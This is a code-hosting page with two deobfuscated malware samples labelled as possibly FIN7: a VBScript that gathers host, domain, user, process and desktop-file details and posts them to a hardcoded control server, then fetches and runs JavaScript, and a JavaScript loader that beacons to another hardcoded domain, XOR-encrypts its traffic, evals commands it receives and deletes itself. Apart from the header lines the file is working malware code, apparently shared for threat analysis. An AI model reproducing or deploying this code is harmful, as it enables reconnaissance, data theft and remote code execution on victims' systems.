Permalink
Apr 14, 2020
Newer
100644
256 lines (244 sloc)
11.6 KB
1
////////////////////////////////////////////////////////////////////////////////
2
////////////////////////////////////////////////////////////////////////////////
3
///// POSSIBLE FIN7 VBS PART DECODER ACTIVE DIRECTORY SEARCHER /////////////////
4
////////////////////////////////////////////////////////////////////////////////
5
////////////////////////////////////////////////////////////////////////////////
6
on error resume next: panel_url = "https://domenuscdm.com/info": set objwmiservice = getobject("winmgmts:" & "{impersonationlevel=impersonate}!\\" & "." & "\root\cimv2"): set wshshell = createobject("wscript.shell"): set fs = createobject("scripting.filesystemobject"): appdata_folder = wshshell.expandenvironmentstrings("%appdata%"): username = wshshell.expandenvironmentstrings("%username%"): function send(url, data): if data = ""
7
then: data = "id=" & get_id() & "&type=get": end
8
if :set xmlhttp = createobject("msxml2.serverxmlhttp"): xmlhttp.open "post", url, false: xmlhttp.setrequestheader "user-agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:6.0) Gecko/20100101 Firefox/67.0": xmlhttp.setrequestheader "content-type", "application/x-www-form-urlencoded": xmlhttp.send data: send = xmlhttp.responsetext: end
9
function: function run_js(js): set tf = fs.createtextfile(appdata_folder & "\some.js", true): tf.write(js): tf.close: strcommand = "wscript.exe " & appdata_folder & "\some.js": set objwmiservice = getobject("winmgmts:" & "{impersonationlevel=impersonate}!\\" & "." & "\root\cimv2"): set objprocess = objwmiservice.get("win32_process"): errreturn = objprocess.create(strcommand, null, null, intprocessid): end
10
function: function get_id(): for each objitem in objwmiservice.execquery("select * from win32_networkadapterconfiguration where ipenabled = true"): macaddress = objitem.macaddress: if typename(macaddress) = "String"
11
and len(macaddress) > 1 then: id = replace(macaddress, ":", ""): exit
12
for: end
13
if :next: get_id = id: end
14
15
16
function: function get_computer_info(mem): set colsettings = objwmiservice.execquery("select * from win32_computersystem"): for each objcomputer in colsettings: hostname = objcomputer.name: domainname = objcomputer.domain: if objcomputer.partofdomain then: domainmember = "yes":
17
else :domainmember = "no": end
18
if :next: if mem = ""
19
then: get_computer_info = "&Hostname=" & hostname & "&DomainMember=" & domainmember & "&DomainName=" & domainname:
20
else :get_computer_info = domainmember: end
21
if :end
22
function: function get_grivers(): set dc = fs.drives: for each drive in dc: drivers = drivers & drive & ";": next: get_grivers = drivers: end
23
function: function get_processlist(): for each process in getobject("winmgmts:{impersonationlevel=impersonate}").instancesof("win32_process"): processlist = processlist & process.name & "%%%": next: get_processlist = processlist: end
24
function: function get_desktopfiles(): desktop = wshshell.specialfolders("desktop"): set col = fs.getfolder(desktop).files: count_d = 0: for each c in col: desktopfilelist = desktopfilelist & c & "%%%": next: get_desktopfiles = desktopfilelist: end
25
function: function count_domain_hosts(): if get_computer_info("mem") = "yes"
26
then: wshshell.run "powershell.exe $s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://'; $s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher (([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2 } }; $path = $env:appdata + '\results.txt';ac $path $n", 0: appdata_file = appdata_folder & "\results.txt": domainhosts = -3: for i = 1 to 6: if fs.fileexists(appdata_file) then: set file = fs.opentextfile(appdata_file, 1): If Not file.atendofstream Then domainhosts = file.readall end
27
if :file.close: fs.deletefile appdata_file: exit
28
for: end
29
if :wscript.sleep(20000): next: count_domain_hosts = domainhosts:
30
else :count_domain_hosts = -1: end
31
if :end
32
function: data = "id=" & get_id() & "&type=put" & get_computer_info("") & "&DomainHosts=" & count_domain_hosts() & "&UserName=" & username & "&LogicalDrives=" & get_grivers() & "&SystemInfo=nothing&SoftwareInfo=nothing&NetworkInfo=nothing&ProcessList=" & get_processlist() & "&DesktopFileList=" & get_desktopfiles() & "&DesktopScreenshot=nothing&WebHistory=nothing&stype=vbs": response = send(panel_url, data): if response = "ok"
33
then: js = send(panel_url, ""): run_js(js): end
34
35
36
////////////////////////////////////////////////////////////////////////////////
37
////////////////////////////////////////////////////////////////////////////////
38
///// POSSIBLE FIN7 JS LOADER NEW MAIN & START_DELAY FUNCTION () ///////////////
39
////////////////////////////////////////////////////////////////////////////////
40
////////////////////////////////////////////////////////////////////////////////
41
42
43
44
function anonymous() {
45
46
///
47
48
var nipgigjehdaf = 'string';
49
var qhuxyzewpu = '&';
50
var qqimgiwpife = 'Scripting.FileSystemObject';
51
var kevfezajpi = 'WScript.Shell';
52
var jiskypfokry = 'winmgmts:root/CIMV2';
53
var ocbuxhygfezir = '&_&';
54
var abxejroqowo = 'request';
55
var dajoxijify = 'POST';
56
var onambevxiva = '';
57
var adymajaxbe = '';
58
var pmidkopihyno = '?type=name';
59
var hfafsucohdiz = 'encrypt';
60
var thojkequho = 'Microsoft';
61
var ujxuxbogrotelq = 'hide';
62
var lwafvehigvisv = 'decrypt';
63
var eliqabweql = 'group=vbs&rt=0&secret=hf63FGEjrg28f2&time=120000&uid=';
64
var habhekxyspudxo = 'delete';
65
var aroligqanzi = 'decrypt';
66
var ofidibahte = 'new';
67
var ixopyzlyk = '&_&';
68
var yqiqazjecy = 'show';
69
var ujumajovamw = 'request';
70
var ymwaqdiqzeqtigv = '_';
71
var hyqxukkemlanfo = 'no';
72
var duwmulydi = 'new';
73
var uzdibikhovfyxf = 'Windows';
74
var tkymjekarlujf = 'https://environmentales.com/';
75
var yqbyjrepwyj = 'pictures';
76
var qlettugibomc = '';
77
var yfsacuwfymijc = '';
78
var sircesadvelny = '&id=';
79
var xvelmonovpumk = 'renew';
80
var efekufuqa = 'encrypt';
81
var emgulmommovab = 'page_id=new';
82
var adsefegezycz = 'img';
83
var noczojceqki = 'Unknown';
84
var gurzukqyzxigru = '';
85
var jlojpefetpu = 'string';
86
var astovqicygy = 'Content-Type';
87
var nokikoxuzd = 'application/x-www-form-urlencoded';
88
var owikvijah = 'User-Agent';
89
var osycfybvic = 'add';
90
var kimxogbabfavfu = 'esmykjykago=';
91
var ozhujyhjuta = 'sync';
92
var ufyqoqdetab = '';
93
var ftixxafijtivy = 'info';
94
var zugykxegotdu = 'no';
95
var ktynfahexxylw = '?type=content&id=';
96
var orcyzuluh = 'MSXML2.ServerXMLHTTP';
97
var epjivehug = 'encrypt';
98
var qomilure = 'AppData';
99
var duhjikgydivr = '/';
100
var ewohkagunecr = 'z';
101
var iwvihfysih = '_';
102
var qlakubuqica = 'POST';
103
var ekvekxytugtath = 'images';
104
var qoropywlykli = '%APPDATA%';
105
function id() {
106
var lrequest = wmi.ExecQuery('select * from Win32_NetworkAdapterConfiguration where ipenabled = true');
107
var lItems = new Enumerator(lrequest);
108
for (; !lItems.atEnd(); lItems.moveNext()) {
109
var mac = lItems.item().macaddress;
110
var dns_hostname = lItems.item().DNSHostName;
111
if (function () {
112
try {
113
return mac.typeof ? mac.typeof : typeof mac;
114
} catch (e) {
115
return typeof mac;
116
}
117
}() === jlojpefetpu && mac.length > 1) {
118
if (function () {
119
try {
120
return dns_hostname.typeof ? dns_hostname.typeof : typeof dns_hostname;
121
} catch (e) {
122
return typeof dns_hostname;
123
}
124
}() !== jlojpefetpu && dns_hostname.length < 1) {
125
dns_hostname = noczojceqki;
126
} else {
127
for (var i = 0; i < dns_hostname.length; i++) {
128
if (dns_hostname.charAt(i) > ewohkagunecr) {
129
dns_hostname = dns_hostname.substr(0, i) + ymwaqdiqzeqtigv + dns_hostname.substr(i + 1);
130
}
131
}
132
}
133
return mac + ymwaqdiqzeqtigv + dns_hostname;
134
}
135
}
136
}
137
function crypt_controller(type, request) {
138
var encryption_key = yfsacuwfymijc;
139
if (type === aroligqanzi) {
140
request = unescape(request);
141
var request_split = request.split(ixopyzlyk);
142
request = request_split[0];
143
encryption_key = request_split[1].split(yfsacuwfymijc);
144
} else {
145
encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(yfsacuwfymijc);
146
request = unescape(encodeURIComponent(request));
147
}
148
var output = new Array(request.length);
149
for (var i = 0; i < request.length; i++) {
150
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
151
output[i] = String.fromCharCode(charCode);
152
}
153
var result_string = output.join(yfsacuwfymijc);
154
if (type === efekufuqa) {
155
result_string = result_string + ixopyzlyk + encryption_key.join(yfsacuwfymijc);
156
result_string = escape(result_string);
157
}
158
return result_string;
159
}
160
function get_path() {
161
var pathes = [
162
ekvekxytugtath,
163
yqbyjrepwyj,
164
adsefegezycz,
165
ftixxafijtivy,
166
duwmulydi
167
];
168
var files = [
169
ozhujyhjuta,
170
yqiqazjecy,
171
ujxuxbogrotelq,
172
osycfybvic,
173
duwmulydi,
174
xvelmonovpumk,
175
habhekxyspudxo
176
];
177
var path = pathes[Math.floor(Math.random() * pathes.length)] + duhjikgydivr + files[Math.floor(Math.random() * files.length)];
178
return tkymjekarlujf + path;
179
}
180
function send_data(type, data, crypt) {
181
{
182
var e;
183
try {
184
var http_object = new ActiveXObject(orcyzuluh);
185
if (type === ujumajovamw) {
186
http_object.open(qlakubuqica, get_path() + pmidkopihyno, false);
187
data = kimxogbabfavfu + crypt_controller(efekufuqa, eliqabweql + uniq_id + sircesadvelny + id() + qhuxyzewpu + data);
188
} else {
189
http_object.open(qlakubuqica, get_path() + ktynfahexxylw + uniq_id, false);
190
if (crypt) {
191
data = crypt_controller(efekufuqa, data);
192
}
193
}
194
http_object.setRequestHeader(owikvijah, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0');
195
http_object.setRequestHeader(astovqicygy, nokikoxuzd);
196
http_object.setOption(2, 13056);
197
http_object.send(data);
198
return http_object.responseText;
199
} catch (_e) {
200
e = _e;
201
{
202
return hyqxukkemlanfo;
203
}
204
}
205
}
206
}
207
function main() {
208
var ncommand = yfsacuwfymijc;
209
ncommand = send_data(ujumajovamw, emgulmommovab, true);
210
if (ncommand !== hyqxukkemlanfo) {
211
{
212
var e;
213
try {
214
eval(rewrite(crypt_controller(aroligqanzi, ncommand), true));
215
} catch (_e) {
216
e = _e;
217
{
218
}
219
}
220
}
221
}
222
var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
223
WScript.Sleep(random_knock);
224
main();
225
}
226
function start_delay() {
227
var s = WScript;
228
s.Sleep(120000);
229
}
230
var first = false;
231
var shell = new ActiveXObject(kevfezajpi); //WScript.Shell
232
var fso = new ActiveXObject(qqimgiwpife); //Scripting.FileSystemObject
233
var wmi = GetObject(jiskypfokry); // winmgmts:root/CIMV2
234
var uniq_id = new Date().getUTCMilliseconds();
235
var app_path = shell.expandEnvironmentStrings(qoropywlykli); //%APPDATA%
236
237
238
if (fso.GetAbsolutePathName(fso.GetParentFolderName(app_path)).indexOf(qomilure) > 5) { // AppData
239
if (WScript.ScriptFullName.indexOf(thojkequho + String.fromCharCode(92) + uzdibikhovfyxf) < 0) {
240
// thojkequho = "Windows"
241
fso.deleteFile(WScript.ScriptFullName);
242
}
243
{
244
var e;
245
try {
246
start_delay();
247
main();
248
} catch (_e) {
249
e = _e;
250
{
251
main();
252
}
253
}
254
}
255
}
256